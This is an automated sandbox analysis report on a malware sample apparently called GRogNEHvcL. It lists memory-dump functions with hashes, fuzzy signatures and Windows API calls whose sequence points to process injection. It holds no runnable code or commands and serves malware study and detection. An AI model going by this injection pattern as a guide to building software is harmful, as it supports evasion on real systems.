                                            • Opcode ID: a2246a41c67bde364964a8e9fd25235d5fde8d84ef9a34d73035e83c4559ce7a
                                            • Instruction ID: d5499312022b466b0c4d4d0d5a3a5bad15d985cd353e75c60bd2116785b75d30
                                            • Opcode Fuzzy Hash: a2246a41c67bde364964a8e9fd25235d5fde8d84ef9a34d73035e83c4559ce7a
                                            • Instruction Fuzzy Hash: AC614971E04118CFDF208F6CC854BBEBFF1AB56316F0D827BE496AB691D23899418B51

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q
                                            • API String ID: 0-127220927
                                            • Opcode ID: 0abbe267f4cfd3b7b672224bd30c13b3648b83ad9307be93601d991e7790754a
                                            • Instruction ID: abf8e0f3a3edcea3558d150cc1ab143737ba98664a663224a58095fbaa0a76aa
                                            • Opcode Fuzzy Hash: 0abbe267f4cfd3b7b672224bd30c13b3648b83ad9307be93601d991e7790754a
                                            • Instruction Fuzzy Hash: 7271BE74B002049FDB249F78E959B6E7FE2EF89705F10846AF8529B3D4DE348C028B94

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q$Te]q
                                            • API String ID: 0-3320153681
                                            • Opcode ID: b952d29f14d9210d0b5106a546d90a1f92a7622ecbaa3c3407f387684f4c95fc
                                            • Instruction ID: b1ccf10ec8089be1e13e3ded152c51b3fcc220e31a763137e94d161d3c5b35f4
                                            • Opcode Fuzzy Hash: b952d29f14d9210d0b5106a546d90a1f92a7622ecbaa3c3407f387684f4c95fc
                                            • Instruction Fuzzy Hash: B771B2B4E042088FDF18CFE9C584AEDBBF6AF89311F10912AE419AB355DB746946CB50

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q
                                            • API String ID: 0-127220927
                                            • Opcode ID: 02de8a724eff652576211314afcb78bcb1557d340d04758078dbfea0459393f2
                                            • Instruction ID: 51ac1e7aa81678c159b27a219884b0fe9b4dbb1997d0a47922da55a0d984e7ce
                                            • Opcode Fuzzy Hash: 02de8a724eff652576211314afcb78bcb1557d340d04758078dbfea0459393f2
                                            • Instruction Fuzzy Hash: 9451AF34B402049FDB249F78E959B6E7FE2EF95705F10842AF9129B3D4DE748C028BA4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q$Te]q
                                            • API String ID: 0-3320153681
                                            • Opcode ID: 2faf370f13c30ebeea9554191810ad85e36b606c1bfbc62f31b3aac1b3d9795e
                                            • Instruction ID: 0c9aebfe8b85d573c38ad4a65968dbee99e11fa763e06f80794cae9d794852e1
                                            • Opcode Fuzzy Hash: 2faf370f13c30ebeea9554191810ad85e36b606c1bfbc62f31b3aac1b3d9795e
                                            • Instruction Fuzzy Hash: C661E374E04248CFDF14CFE9C884AADBFB6BF89311F10812AE509AB355DB755946CB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q$Te]q
                                            • API String ID: 0-3320153681
                                            • Opcode ID: 270b8174ab05d15c14858c98c6f4b06c35eb2dccebf654d19ddefe03d4b32993
                                            • Instruction ID: bd90a114decb3c41b500ed44a6bee46e97cf55328aaa3c5d3f2607a4319b724d
                                            • Opcode Fuzzy Hash: 270b8174ab05d15c14858c98c6f4b06c35eb2dccebf654d19ddefe03d4b32993
                                            • Instruction Fuzzy Hash: 016101B4E04248CFDF18CFE9C584AADBBF6BF88311F14802AE449AB365DB745946CB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q$Te]q
                                            • API String ID: 0-3320153681
                                            • Opcode ID: ac8f96b0105db0353e2817c959860313d73ef8ef323e8ac4ade382842b6b96e8
                                            • Instruction ID: 42f9f72979862698ea51bb4d86dcaf70668080daf931cf891ed89bbbad58053f
                                            • Opcode Fuzzy Hash: ac8f96b0105db0353e2817c959860313d73ef8ef323e8ac4ade382842b6b96e8
                                            • Instruction Fuzzy Hash: EE51D474E04208CFDF14CFE9C884AADBBF6BF89311F10912AE419AB355DB745946CB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Haq$Haq
                                            • API String ID: 0-4016896955
                                            • Opcode ID: b07000118a98ba030be9b9c44a59e95e855a97cb6617dee4d36916ddbab935cb
                                            • Instruction ID: 687d20a92a4f7dc2a0f9e2dfc0d843021e7d7da6ca926c732580e433509eb21a
                                            • Opcode Fuzzy Hash: b07000118a98ba030be9b9c44a59e95e855a97cb6617dee4d36916ddbab935cb
                                            • Instruction Fuzzy Hash: 69312771A24251DFCF21CF7C981037ABFA1FB45312F044AABE4A9872C2C7789505C7A2
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06E4536E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 77e44a61aedc0cd8e03a3d259d1e3b0b6e82e3c60488efc56a3bfa9d9ebb23d5
                                            • Instruction ID: fb7983fff1e4afef1739dfbd57a2ff0fc8373e8dcb03089dbbd7a2b68510dccf
                                            • Opcode Fuzzy Hash: 77e44a61aedc0cd8e03a3d259d1e3b0b6e82e3c60488efc56a3bfa9d9ebb23d5
                                            • Instruction Fuzzy Hash: 8EA18B71D00319CFDB64DFA8D8407EDBBB2BF49314F1485AAE809A7290DB749986CF91
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06E4536E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: bebcd7736e30d8c1c7864783fc529204a5469f6f3a854dd0788faeaa6a3060ca
                                            • Instruction ID: f71bc3635654de9010257f6dca2e4f4a1beb8e9a3fdb95a66e776877bf365792
                                            • Opcode Fuzzy Hash: bebcd7736e30d8c1c7864783fc529204a5469f6f3a854dd0788faeaa6a3060ca
                                            • Instruction Fuzzy Hash: B3917A71D00319CFDB64DFA8D840BEDBBB2BF48314F1485AAE819A7250DB749986CF91
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0119AFFE
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2259653737.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1190000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: b0b0ba2ab8cd53a6d628826dd265d140cdbbc774c487b730c6563f30d6d68023
                                            • Instruction ID: 02087532f7d20ec130b8488ff611328dbb5fe4d4e2d13a779e12b036fb14c0a1
                                            • Opcode Fuzzy Hash: b0b0ba2ab8cd53a6d628826dd265d140cdbbc774c487b730c6563f30d6d68023
                                            • Instruction Fuzzy Hash: F3716670A00B158FDB28DF2AE14175ABBF5FF88304F00892DD59AD7A50DB75E849CBA1
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 011959C9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2259653737.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1190000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: fa5c9bc5d03bceafbae100ab9267018f1b62cb2f2dc65a3d97275e3ad70e40e5
                                            • Instruction ID: 4f074dd23432d19e3daeb550799c8b19d28a1e7aee2a904199dcbd378537a307
                                            • Opcode Fuzzy Hash: fa5c9bc5d03bceafbae100ab9267018f1b62cb2f2dc65a3d97275e3ad70e40e5
                                            • Instruction Fuzzy Hash: 4A41D1B0C0072DCBDB29DFA9C884B9DBBB6BF49304F20806AD418BB255DB756945CF91
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 011959C9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2259653737.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1190000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 3f6ffef6f8b1debdebd40bed188dd0259c8c7b102ef7272bcd448ae28db8725f
                                            • Instruction ID: 14d35b0dfd95fc5fbab9c6bdc1279445ecbfa9f7eec66e703fd11bca2c5933a0
                                            • Opcode Fuzzy Hash: 3f6ffef6f8b1debdebd40bed188dd0259c8c7b102ef7272bcd448ae28db8725f
                                            • Instruction Fuzzy Hash: 5B41E2B0C0071DCBDB29DFA9C98479DBBB6BF49304F20805AD418BB255DB756946CF90
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0119D656,?,?,?,?,?), ref: 0119D717
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2259653737.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1190000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 36b04745c7e6ba1327eed1b7ca108b97aacbb6769606b65716d1d8a8f5f7973b
                                            • Instruction ID: 6088f4a59ca349c94fffba03995174b2d5c848765d09a61fd8829081e78fa093
                                            • Opcode Fuzzy Hash: 36b04745c7e6ba1327eed1b7ca108b97aacbb6769606b65716d1d8a8f5f7973b
                                            • Instruction Fuzzy Hash: 7F31B078A803809FEB049F60F6467693BB6F788754F918829F9118B7C8DBB85956CF10
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q
                                            • API String ID: 0-52440209
                                            • Opcode ID: 3d80e44f696f62b69e910c1a027eb4dbc32b9544bd006a1a0ab328141dd44d23
                                            • Instruction ID: 83c1e34a519bc859a5c568639cae8c460666486c24a95996b59d1d5e630658f3
                                            • Opcode Fuzzy Hash: 3d80e44f696f62b69e910c1a027eb4dbc32b9544bd006a1a0ab328141dd44d23
                                            • Instruction Fuzzy Hash: 73D13574E04209CFCB14DFA8D480AEDBBBAFF88301F10962AD409AB355D774A946CF60
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06E44F40
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 28eb40b4caea3f87c1a4b2ab112268f3111590812dbf76291e2016f043ff36f7
                                            • Instruction ID: 90c44c3daf912a99cfb54ad457c432fd8759a517c0ce9739f6a7dd26ea45cf3e
                                            • Opcode Fuzzy Hash: 28eb40b4caea3f87c1a4b2ab112268f3111590812dbf76291e2016f043ff36f7
                                            • Instruction Fuzzy Hash: A5214875900349DFCB10DFAAD841BEEBBF5FF48314F108429E919A7251C7789944CBA4
                                            APIs
                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0720518D,?,?), ref: 0720523F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277333950.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7200000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DrawText
                                            • String ID:
                                            • API String ID: 2175133113-0
                                            • Opcode ID: ba7aea86074ec02d445dd4b41cdda547ddb5870aa777d2c3b1fe5deebcf3ed83
                                            • Instruction ID: cebf1705d139b83ea2a54f0761098a4396a69b8b668348839516eadf495a990d
                                            • Opcode Fuzzy Hash: ba7aea86074ec02d445dd4b41cdda547ddb5870aa777d2c3b1fe5deebcf3ed83
                                            • Instruction Fuzzy Hash: 7531E2B590024A9FCB10CF9AD884A9EFBF5FF58320F14842AE919A7350D374A554CFA4
                                            APIs
                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0720518D,?,?), ref: 0720523F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277333950.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7200000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DrawText
                                            • String ID:
                                            • API String ID: 2175133113-0
                                            • Opcode ID: 8829d19849fecf40b98d1744faad06e304cea40a3bf5ed7f9f9d95f3329355e7
                                            • Instruction ID: 03dba4ca9e591eca8a14f4f5be60843a1000f74e67f7a65b9da43b0fbf8c93bf
                                            • Opcode Fuzzy Hash: 8829d19849fecf40b98d1744faad06e304cea40a3bf5ed7f9f9d95f3329355e7
                                            • Instruction Fuzzy Hash: 7831E0B591020A9FDB10CF9AD884AAEFBF5FF58310F14842AE919A7250D374A950CFA0
                                            APIs
                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0720518D,?,?), ref: 0720523F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277333950.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7200000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DrawText
                                            • String ID:
                                            • API String ID: 2175133113-0
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06E44F40
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06E45020
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E4495E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0119D656,?,?,?,?,?), ref: 0119D717
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2259653737.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1190000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0119D656,?,?,?,?,?), ref: 0119D717
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2259653737.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1190000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06E45020
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E4495E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E44E5E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0119B079,00000800,00000000,00000000), ref: 0119B28A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2259653737.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1190000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0119B079,00000800,00000000,00000000), ref: 0119B28A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2259653737.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1190000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E44E5E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            APIs
                                            • ResumeThread.KERNELBASE(?), ref: 06E4445A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            APIs
                                            • ResumeThread.KERNELBASE(?), ref: 06E4445A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06E48AED
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0119AFFE
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2259653737.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1190000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06E48AED
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: aj^
                                            • API String ID: 0-2778040283
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Haq
                                            • API String ID: 0-725504367
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q
                                            • API String ID: 0-52440209
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 64e5137b99838e4a907cbc575c124da855fbf9b19d46fa471dc3bfe6f02016d5
                                            • Instruction ID: b33f49ca7148cf1b04d589d2d2cb7004c1d242f20726af9029276cd9e7a90adf
                                            • Opcode Fuzzy Hash: 64e5137b99838e4a907cbc575c124da855fbf9b19d46fa471dc3bfe6f02016d5
                                            • Instruction Fuzzy Hash: 0A516A74D09209CFDF18CFAAC4446EEBFFAAB8D302F14D26AE499A3251D7744941CB64
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ab9ff2ad8101aa5d32dff221b48a41e9b19b1ec350554bbf90bfd8f2ac7661fd
                                            • Instruction ID: 6998804477e6d6a95daf28f7c2f9c926774c07277185a6b23e1e80d10b995cc0
                                            • Opcode Fuzzy Hash: ab9ff2ad8101aa5d32dff221b48a41e9b19b1ec350554bbf90bfd8f2ac7661fd
                                            • Instruction Fuzzy Hash: 5741E571E09294CFCB218B6C950066ABFE1AF52316F5B80ABD0E5CB256CB35C843CB55
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 74dacf7a6a6ef56a443f6d3b1d53609bc8900dbda1d1ab2fc142b8def1a8dec9
                                            • Instruction ID: 6f8592ec83c7d38f266fb0681ab7b59966e950473f224d20ea70a74b169f52d9
                                            • Opcode Fuzzy Hash: 74dacf7a6a6ef56a443f6d3b1d53609bc8900dbda1d1ab2fc142b8def1a8dec9
                                            • Instruction Fuzzy Hash: 48516B30E64204DBEF24CF69D9587BEBFF1EF54306F148167E492AA291C7388A42DB51
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7496df8a30664bd8923751f632f0198f163e890e912fb4bb99f17dae53ad54a0
                                            • Instruction ID: bdfeb7a7703cbe2d216bec68010348bcda45ea52bdc2ffb492b0d0a469c1f869
                                            • Opcode Fuzzy Hash: 7496df8a30664bd8923751f632f0198f163e890e912fb4bb99f17dae53ad54a0
                                            • Instruction Fuzzy Hash: C341B375509BC08FD3239B39A5545417FF0BF8730275A8ADBC4C5CBAA3C629981AC726
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e2b25dbb17507ceace9f5b82c06f758aa4d7c4e226c3407fc7dcf0f7a7587eae
                                            • Instruction ID: f656ae2f6ad8aceb82a9265d376262c4345867838675719a908eb714fbbc40a4
                                            • Opcode Fuzzy Hash: e2b25dbb17507ceace9f5b82c06f758aa4d7c4e226c3407fc7dcf0f7a7587eae
                                            • Instruction Fuzzy Hash: 76415FB5E00615CFDF24EBB4D1547AEBEB2EB88325F14483AD441A7390DB354982CBA6
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
